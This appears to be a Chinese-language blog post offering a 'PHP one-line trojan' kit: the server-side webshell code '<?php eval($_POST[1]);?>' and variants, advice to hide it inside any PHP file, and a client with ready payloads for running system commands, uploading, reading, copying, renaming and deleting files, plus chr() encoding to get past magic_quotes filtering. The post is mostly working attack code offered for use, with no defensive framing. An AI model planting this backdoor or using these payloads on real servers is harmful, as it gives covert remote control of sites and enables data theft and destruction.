PHP一句话木马客户端

  • A+
所属分类:轻松一刻
摘要

提交网址:           Cmd:      

发送执行的主代码:
                              echo copy($_FILES[LanKerF][tmp_name],$_FILES[LanKerF][name]);        
                                 
  上传文件时需要此项: >                            

 

PHP一句话木马客户端

PHP一句话木马客户端

 

☆PHP微型木马客户端☆

 

   

 

 

 
PHP微型木马客户端--完美源码
 

提交网址:           Cmd:      

发送执行的主代码:
                              echo copy($_FILES[LanKerF][tmp_name],$_FILES[LanKerF][name]);        
                                 
  上传文件时需要此项:

>
                    
      
 

   

 
 

   

 
常用执行代码及代码说明
                                                         
 
//////////////////////////////////PHP环境变量//////////////////////////////
 
phpinfo();
 
//////////////////////////////////程序目录/////////////////////////////////
 
echo dirname(__FILE__); 或 echo __FILE__;
 
//////////////////////////////////执行CMD//////////////////////////////////
 
system(dir);  passthru(dir); //其他的自己可以模仿写
 
//////////////////////////////////上传文件/////////////////////////////////
 
echo copy($_FILES[LanKerF][tmp_name],$_FILES[LanKerF][name]);
 
//////////////////////////////////读取文件/////////////////////////////////
 
// $filename为文件名,需要绝对目录,而且在magic_quotes_gpc = on时需要转换字符
$filename= chr(73).chr(58).chr(92).chr(119).chr(119).chr(119).chr(114).chr(111).chr(111).chr(116).chr(92).chr(112).chr(104).chr(112).chr(116).chr(101).chr(115).chr(116).chr(92).chr(117).chr(112).chr(46).chr(112).chr(104).chr(112);
//$filename="i:wwwrootphptestup.htm"
$s=chr(60).chr(112).chr(114).chr(101).chr(62);
$e=chr(60).chr(47).chr(112).chr(114).chr(101).chr(62);
$fp=@fopen($filename,r);
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents=htmlspecialchars($contents);
echo $s.$contents.$e;
 
//////////////////////////////////读取目录//////////////////////////////////
 
//$dir 为目录名,需要绝对目录,而且在magic_quotes_gpc = on时需要转换字符
$dir=chr(73).chr(58).chr(92).chr(119).chr(119).chr(119).chr(114).chr(111).chr(111).chr(116).chr(92).chr(112).chr(104).chr(112).chr(116).chr(101).chr(115).chr(116);
//$dir="c:/"
$f = chr(60).chr(98).chr(114).chr(62);//分隔符
$dir=@dir($dir);
if($dir) 
{
  echo path_______.$dir->path.$f;
  while($entry=$dir->read())
{
 echo ____.$entry.$f; 
  }
  $dir->close();
}
else
{echo 0;}
 
//////////////////////////////////复制文件///////////////////////////////
 
// 同上,当magic_quotes_gpc = on时,变量$a,$b需要字符转换。
//可以根据需要是否采用容错处理,成功时返回1
$a="i:/wwwroot/lanker/lk.txt";  //要复制的源文件
$b="i:/wwwroot/lanker.txt";   //复制后的文件路径及文件名
echo @copy($a,$b); 
 
//////////////////////////////////重命名文件//////////////////////////////
 
$a="i:/wwwroot/lk.txt";     //要改名的文件
$b="i:/wwwroot/lanker.txt"; //改名后的文件
echo @rename($a,$b);
 
//////////////////////////////////删除文件////////////////////////////////
 
$a="i:/wwwroot/lanker.txt";  //要删除的文件
echo @unlink($a);
 
//////////////////////////////////////////////////////////////////////////
   
   

 

   

           

   

 
 

   

            

   

 
   

     

字符转换工具
 
       要转换的字符:   
 
   
 
      转换后的字符:   
                 
   
     
      (当php.ini中的magic_quotes_gpc = on时,必须进行字符转换)

               

 

   

 
PHP微型后门服务端代码为:<?php eval($_POST[1]);?>
      PHP微型后门服务端容错代码为:<?php @eval($_POST[1]);?>
      PHP微型后门服务端超简型代码为:<?eval($1);?>
   

说明: 可以把服务端代码插入任意一PHP文件之中,隐蔽行比较好.但由于PHP语言本身的限制,特别是 magic_quotes_gpc = on 的时候限制,实现的功能也就大打折扣.但还好这个木马实现的一般功能已经基本上够用了.

  • 我的微信公众号
  • 扫一扫关注
  • weinxin
  • 我的新浪微博号
  • 扫一扫关注
  • weinxin
小辉博客

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: